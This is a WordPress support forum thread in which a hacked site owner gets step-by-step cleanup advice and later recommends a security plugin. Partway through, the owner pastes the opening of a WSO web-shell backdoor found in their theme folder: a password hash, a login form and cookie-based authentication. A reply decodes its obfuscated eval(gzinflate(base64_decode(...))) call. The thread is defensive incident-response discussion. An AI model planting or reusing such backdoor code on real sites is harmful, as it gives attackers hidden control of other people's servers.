• Resolved syzygist


    I discovered I’d been hacked when trying to download a theme backup file triggered an antivirus alert. I eventually identified the infected file as an extra file in my theme’s Functions directory that was named very similarly to a file that was supposed to be there (but had a different date from everything else in the directory, aha!).

    I have the content of that file as text, but I don’t know how to safely post it. It’s mostly long alphanumeric strings with a few interspersed php commands, but I don’t know any php, so I can’t deduce anything from it.

    Although I have not seen any impact on my public site thus far, I seem to have a Google AdSense plugin that I’m pretty sure I didn’t have before, and all the files in that directory have the same date as the infected file (and a time 5 minutes earlier).

    My login name was also changed back to admin. I’m guessing that’s how someone else was able to install a plugin.

    I have not done anything so far other than removing the infected file, as I am unsure of the best way to proceed. I would really appreciate it if someone would tell me how to safely post the contents of the infected file so I can get feedback to any clues it might hold.

    Also, I’m not sure what to do about the AdSense plugin. I haven’t changed any passwords yet because I know it won’t do much good if I haven’t rooted out backdoors, but I don’t know how to do that.

    The site is large and fairly complex. I haven’t been posting much lately, so the last backup I have is from May. I am really hoping to avoid rolling back to that, though, as I have comments and other things I don’t want to lose. I’m also hoping to avoid manually uploading a fresh WordPress installation – I did that once, and it took all day!

    I have low intermediate html skills, and no knowledge of php, so use easy words, please!

Viewing 10 replies - 1 through 10 (of 10 total)
  • Hello, syzygist, & welcome to the WordPress support forum. Unfortunately, when a hack has occurred, finding 1 infected file may (& probably does) mean there are others.

    Clearing a hack is a lot of work. I sincerely advise you not to take shortcuts, as doing so will likely only cause your site to become reinfected. The following is a long process, but a necessary one.

    A resource you can go to is:

    When dealing w/a site compromise, the objectives are twofold:
    1) Fix the site; &
    2) Fix backdoors that the hacker used to gain entrance into your site, so this hopefully will not happen again.

    Most people place great emphasis on objective #1, but, in truth, the 2nd one is actually the most important, as, without it, your site will continue to be reinfected.

    Here are the steps to take.

    First, notify your host, as this might be a serverside hack as opposed to simply a site compromise. Also, if you’re on shared hosting, the hack has the potential to compromise the entire server. Additionally, you may wish to take the site offline, & your host can help you do this. They might not help you–then again, they might. You won’t know unless you notify them. If they say it’s not their responsibility, (& it really may not be), then please continue reading.

    Second, scan any devices you will use to log onto your website for malware. It does no good to change credentials, etc., which you will need to do, if malware phones them home to their command & control center. It’s actually better to do more than 1 scan, each using a different program, as no single malware scanner can detect everything.

    Third, secure your network. Definitively use secure FTP as opposed to regular FTP. The port used for secure FTP varies from host to host. Many use port 22, some 2222, while others use different ports altogether. Check their knowledge base or call their support. You can ask this question when you notify them of the compromise in the first step.

    Never log onto your site using a public hotspot, such as those in hotels, cafes, etc. Make sure you’ve changed the default password, Ssid, (&, if applicable) the username on your router/modem. If you don’t use wireless, turn it off in your router’s options.

    All these steps are required to ensure that no one can snoop your credentials, etc.

    Now that the device you’ll use to fix your site, as well as your network, is secure, it’s time to direct your attention to actually fixing your site.

    Next, please log into your website control panel from a secure connection and change all passwords, including those to any databases you may have set up. This includes your control panel/FTP credentials & your WordPress database.

    Next, take a backup of your website’s files. Be certain to label it such that the label contains both the date you backed it up on, as well as the word “hacked”–we certainly don’t want you accidentally restoring this backup! This can be helpful, though, in terms of perhaps being able to determine how this occurred, though my feeling is that it likely did so because of an outdated site. Probably you should just back up your web root. Depending on your host, it might be called public_html, htdocs, www, or /.

    Please also back up your database as well. The article at
    shows you how to do that, in case you need it. The section regarding phpMyadmin is likely the most relevant to your case.

    It’s going to be necessary to search that database file to see if any evidence of the hack exists there. That can be done by opening the file in a text editor. To start off with, consider searching for the words:

    <? php;

    You might also wish at this point to backup your WordPress content. To do that:
    * Log into your WordPress dashboard.
    * Go to ‘Tools > Export’.
    * Choose to export all content.

    While in your dashboard, go to ‘Users > All Users’ and delete any users there that you don’t recognize, especially administrators.

    Also be advised that sometimes supposed image files can contain code, so open all your image files, particularly in your uploads folders, to ensure they really are images & don’t contain code. Better yet, if you have the images on your machine, replace files in the uploads folders with them.

    If you find nothing, either in your database or in your /uploads folders, then the next step is to delete, then completely reinstall WordPress, as well as any plugins or themes you were using. I also advise creating an entirely new database w/a new user & password.

    Please also let someone knowledgeable look at your .htaccess file so they can make certain no backdoor code exists there.

    In summary, here are the steps:
    1) Back up your WordPress files, including core, themes, & plugins;
    2) Back up your database using PhpMyadmin;
    3) Look through the database to insure there is no evidence of the hack;
    4) Search the uploads folders for image files that contain code;
    5) Let someone knowledgeable look at your .htaccess file.
    6) If you have doubts about your database, please have a professional take a look.

    I’m sorry this happened to you. I hope this helps. Please let us examine your .htaccess file, & please let us know if you require additional help.

    Thread Starter syzygist


    Hi Jackie,

    Many thanks for your response. Here is what I have done so far (not necessarily in order):

    Deleted the infected file that was in my theme’s Functions folder. I think it might have been a backdoor, not that I have any familiarity with such things, or with php, but there was stuff about passwords and cookies in it. I’ll post it, if someone can tell me how to do that safely.

    Created a new admin account with a strong password, and deleted the one the hacker had changed back to “admin”

    Changed the admin user login account from phpMyAdmin, after already changing it from the WordPress dashboard (my webhost was insistent on this)

    Changed my Cpanel and FTP passwords

    Had secure FTP implemented on on my account, and updated my login info in my FTP client

    Changed the “secret passwords” in the wp-config files of all 3 of my WordPress installations.

    Checked all my htaccess files (they matched the ones that are posted on www.ads-software.com)

    Went through every directory of public html looking for files with the same dates as the infected file (this is how I discovered that I had a new GoogleAdsense plugin that I hadn’t installed).

    Uninstalled GoogleAdsense plugin

    Downloaded backups of my 3 databases (I had already backed up the rest of my site the day of the hack)

    Searched the sql file of my top level domain for the 4 strings you mentioned. There were a none for the 2, 3rd & 4th strings. I did find a couple of scripts to run videos linked in the WordPress news section, but they appeared to link to legit URLs

    However, this section near the beginning of the sql file looked a little weird (not that I’ve ever looked at my sql file before):

    ‘LOCK TABLES wp_comment_notifier WRITE;
    /*!40000 ALTER TABLE wp_comment_notifier DISABLE KEYS */;
    INSERT INTO wp_comment_notifier (id, post_id, name, email, token) VALUES —-then a bunch of email addresses with additional number codes and user names, about half of which had the same user name despite the different emails (this might be someone I blocked several years back before I learned other ways to manage comment spam). My site does not have users. These were alphabetical, but only went through D ——–
    /*!40000 ALTER TABLE wp_comment_notifier ENABLE KEYS */;

    I have been in touch with my webhost for several days. Frankly, they couldn’t care less. They had already scanned my files and told me they were clean before I found the infected file. They continue to tell me everything’s fine, like I’d believe them after that!

    When I asked why my raw logs were in Chinese, they said something vague about the scripts they were using. It wouldn’t surprise me at all if the infection came from the server. There have been intermittent service outages for several weeks. However, I admit my username and password weren’t as strong as they could’ve been.

    The hacked theme file was in the top level domain. I also have an add-on domain, and the add-on domain has a sub domain. There were no files with the hack date in add-on and subdomain directories, and their htaccess files looked fine, but I changed the wp-config passwords anyway. Do I also have to change my login passwords for the other two domains?

    syzygist, I understand you’re trying not to reinstall, but w/a site compromise, it really is the best way. Export your content, backup any folders that have your files, i.e., uploads, delete the entire site, create a new database, & reinstall. You can then import your content. Make certain none of your image files in the uploads folders contain php code. I know it’s a hassle. I’ve fixed many a hacked site, & it purely bites. But I really am afraid that by not doing so, you’re going to end up w/a reinfected site. It’s bad for you, it’s worse if your visitors end up getting their computers infected.

    & yes–by all means–change every password on every domain you’ve got–please.

    My email is available in my profile, I believe. If you’d like to send the file for my analysis, feel free. It always interests me to see what these miscreants do. You can put code in backticks, i.e. code but if it’s long, as you state, then there may not be sufficient space here.

    Thread Starter syzygist


    Here are my htaccess files. The files for the add-on domain and its subdomain are the same. The first line in both of them had to be noted out recently, as it was causing several of my dashboard panels not to appear. My webhost edited the htacess file for the add-on domain a few days back (before I discovered the hack). Not sure why they noted the problematic line out rather than removing it, but I figured (with reservations) they knew what they were doing. I noted out the same first line in the subdomain file myself yesterday when the dashboard displayed the same problem.

    #AddHandler application/x-httpd-php52 .php .php5 .php4 .php3
    # BEGIN WordPress
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteRule ^index\.php$ - [L]
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . /index.php [L]
    # END WordPress

    Here is the htacess file for the top level domain (in which the infected file was found). I have both the .com and the .net registered. I use the .net, and the .com is parked, and redirects to the .net:

    RewriteEngine on
    RewriteCond %{HTTP_HOST} ^mydomain\.com$ [OR]
    RewriteCond %{HTTP_HOST} ^www\.mydomain\.com$
    RewriteRule ^/?$ "http\:\/\/mydomain\.net" [R=301,L]
    # BEGIN WordPress
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteRule ^index\.php$ - [L]
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . /index.php [L]
    # END WordPress

    Here is the text of the infected file with the php tags removed from the beginning and end (since I don’t know much about php, I’m playing it safe):

    ##   ##   ###              # ####        ####  #####
    	    #  #  # #  # # # # ##     ###   #       ####        #
    	   #####  #  # # # # ##      #  #  #           #      #
    	   #   #  #   #  # # #       #### #####     ####     #######
    $auth_pass = "ee48d18bd2257225fd94ffe54d0d5480";
    function wsoLogin() {
    	die("<pre align=center>	<img alt='Proble Officer' src='' />
    <form method=post>Password : <input type=password name=pass><input type=submit value='>>'></form></pre>");
    function WSOsetcookie($k, $v) {
        $_COOKIE[$k] = $v;
        setcookie($k, $v);
    if(!empty($auth_pass)) {
        if(isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass))
            WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);
        if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass))

    It looks like some sort of ascill logo at the top, but I can’t make it out. Do hackers do that?

    Thread Starter syzygist


    Can anyone translate for me what the php code in the hacked file does? My newly-created admin user was once again hijacked, with the username changed to admin, and the password changed. I was able to get back in to my site, but I don’t know that there’s much point to creating new users if they’re just going to get hijacked again.

    I would also like to understand how the hackers were able to upload files to my WordPress installation. Does this mean they have FTP access? If that is the case, don’t I need to be worried about files above my public_html directory?

    While I appreciate the responses thus far, I don’t think the respondents quite understand how complex and overwhelming all this is for someone who isn’t regularly mucking about in the WordPress backend, and moving/restoring sites. It’s not just a case of doing something I already know how to do and have done many times before. I have to learn how to do it first. When I talk about it taking days, I am not exaggerating.

    And I don’t have days. Please understand that I mean this literally, I am not just expressing an unwillingness to use my time that way. I have limited time to spend on this, which does not in any way express that it is unimportant to me, but is just the reality of my life, which is already a juggling act, without the added stress of trying to figure this all out.

    The top level site is large and complex, with a number of plugins that connect with external accounts, such as polls and social media. It has hundreds of posts and images. The subdomain is my business site. Both of these sites represent countless hours of effort and study on my part, and are very important to me.

    I would really appreciate some help here.

    Hello, syzygist. I know it’s hard to believe this, but I truly understand you’re overwhelmed, angry, frustrated, & scared your work is going to go up in flames. I hear that. I really do.

    Unfortunately, a hack requires at least some degree of technical expertise–more than just a little, actually. There are many ways the criminals can gain entrance to a site, the most common of which are sites that are outdated & passwords that are weak. Sometimes, also, especially if you’re on shared hosting, someone else’s compromised site can cause yours to become compromised as well. This is why I suggested initially that your host be notified of the hack.

    I also suggested in my initial post that you change your control panel password, as this would hopefully stop the cybercriminals from further FTP access, if indeed they have it. Having said that, there’s virtually assuredly a backdoor on your site at this point, so unless that’s found, it may not initially prove helpful. It needs to be done nonetheless.

    These bad actors can upload bad files to your uploads folders, they can put code in files in other folders on your site, & even insert code into your database. Trying to find every instance can be a difficult task at its best, & it’s why I basically recommended reinstalling, being sure, however, that the database(s) is/are clean.

    If you feel incapable of dealing w/this–& many folks do–then might I suggest you consider hiring a professional to help you w/this. I’ll look at the text of your file & see if I can’t provide some insights.

    I’m truly sorry this happened to you–more than I can express, truthfully.

    Thread Starter syzygist


    Thanks for the sympathetic responses. It’s very stressful – I really wish I could afford to have someone else fix it for me, believe me! And then my AV program started identifying this page as a threat because of the text I posted and blocking access! I did finally figure out the way around that.

    Today I ran two different malware scanners on my computer, as Jackie suggested. They found what appeared to be a trojan and a related pup in an appdata temp file of a user account on my computer that I rarely log in to. I removed them both (along with about 3 gb of tracking cookies!). They were dated last year, for what that’s worth, so I don’t know whether they were related to the current problem or not.

    Then I installed and ran the Exploit Scanner plugin from my top level WP installation. It identified hundreds of possible threats, 134 of them in the “severe” category. While some of these are doubtless false positives (I did have it include display:none and visibility: hidden), it did drive home the point Jackie has been trying to make about how difficult it would be to track down everything the hackers installed.

    To whittle away at the dubious file list a little, I deleted all plugins and all but the active theme from the add-on subdomain, many of which were not current, as I use that domain primarily for testing. I am fine with just doing a reinstallation of WordPress in that directory, as there is no content I need to keep.

    However, I’m wondering if I should do that last. In fact, I’m wondering in general what order I should be doing things in to minimize the chance of reinfection.

    A checklist in the order that the different things should be done would be very helpful. For example, if I am going to reinstall all my plugin, theme and WordPress files, do I even need to change the passwords in my wp-config file again?

    Can anyone refer me to a beginner-friendly step-by-step for how to save all my content and reinstall?

    Hello again, syzygist. Your content resides in 2 places. The first is your wp-content/uploads folder, unless, of course, you moved that to some other locations. The 2nd place where your content resides is in the WordPress database(s) associated w/the site(s).

    In my initial post, I told you that the uploads folder was a prime place for miscreants to put their nasty files because of the decreased file permissions that are typical of those folders. I believe I also told you in that same post how to go about backing up your database, but I do understand that the instructions weren’t very specific, because hosts & the applications they use differ wildly. There simply are no standards.

    Please understand that as support forum volunteers, we are bound by certain rules, i.e., we cannot log into sites, nor can we request login information. Thus, we really cannot offer to assist w/these types of problems. We also don’t know your passwords, i.e., when you make a password on www.ads-software.com, those are encrypted heavily, so we have no access. Plese absolutely *do not* post them here. We don’t want to know them.

    I truly understand it must seem as though we’re not being very helpful. We’re trying, but there’s only so much we can do given the constraints under which we operate. If I had a magic wand, I’d make it go away, but…

    Could you please give us your domain?

    syzygist, you might recall in my initial post I spoke of words like “base64” & “eval. Much of the file you pasted in is encoded in base64, but when you translate that section beginning with \x65\x76\x61\x6C\x28\x67\x7A it ends up being translated as eval (gzinflate(base64_decode(….

    Here’s what I’d advise.
    1) Backup your database. I believe I gave you a link in my initial post as to how to go about doing that. Save the backup database file to your computer.
    2) From your dashboard, go to ‘Tools > Export’. Choose to export the types of content you want, but it’s probably best you not check the ‘Attachments’ checkbox. Save the file to your computer.
    3) Backup the current site. If you don’t wish to backup the entire site, then at least backup wp-content/uploads. Also be sure to backup any other folders that have content which you have generated, i.e., pictures, documents, music, etc. If you do backup the entire site, then, as I mentioned previously, label that backup w/at least the date & the word hack.
    4) Once the site backup is complete, delete the site.
    5) Likely the easiest way, if your hosting provider has a 1-click installer in your control panel, is to use that to install WordPress.
    6) Upload *fresh* copies of any themes & plugins you use. Also reupload your wp-content/uploads folder & any other user-generated content.
    7) Go to ‘Tools > Import’ & import your content.

    There are other ways if glitches occur–& they can–but this is likely the most straightforward way.

    WordPress has an IRC support chat channel. I’m sure there’s always someone up there who would be able to help, &, if we could arrange schedules, I’d be happy to make an appearance up there for some 1-on-1, if you think it would help.

    Thread Starter syzygist


    For others who encounter this problem, I highly recommend the plugin WordFence. As Red Deer Web Design mentioned, it can check WordPress core, plugin and theme files against a repository of the latest released version, and find hacker files masquerading as something else. It was so sensitive, it found files that differed from the original by only one character. It also identified files that were not part of a normal installation. WordFence scans turned up several infected files that I never would’ve found on my own.

    It can also block new accounts with the username “admin” from being created, which was very helpful in my situation, and you can set your firewall to automatically block IPs that engage in questionable behavior (such as repeatedly trying to log in, or access non-existent files). All of the options are explained right on the spot where you choose the setting, in beginner-friendly language with recommended settings.

    WordFence also now notifies me immediately when someone logs in to my dashboard or makes any changes to my installation.

    Last, but not least, WordFence lets you watch what site visitors are doing in real time. This is very useful if you know a hacker is currently attacking you, as you can block their ip address. It’s also interesting even if you aren’t being hacked!

    It runs automatic scans, and you can also scan manually. It also has a fast cache that was more user-friendly and a lot less complicated than other plugins I have tried that were strictly for caching.

    All of the above is in the free version, and was extremely helpful to me. So far, I seem to have been successful at locking the hacker out without having to reinstall all of my sites. I installed WordFence on all three of my domains, but I don’t know whether I needed to, as the top-level installation catches things in the add-on and subdomains.

    I am not in any way affiliated with the developers of WordFence, in case you were wondering. Check them out, you’ll see that a lot of their users talk about them in glowing terms. I only wish I had found them sooner, ideally *before* I was hacked – maybe I never would have been!

Viewing 10 replies - 1 through 10 (of 10 total)
  • The topic ‘Trojan changed login name, installed Google AdSense’ is closed to new replies.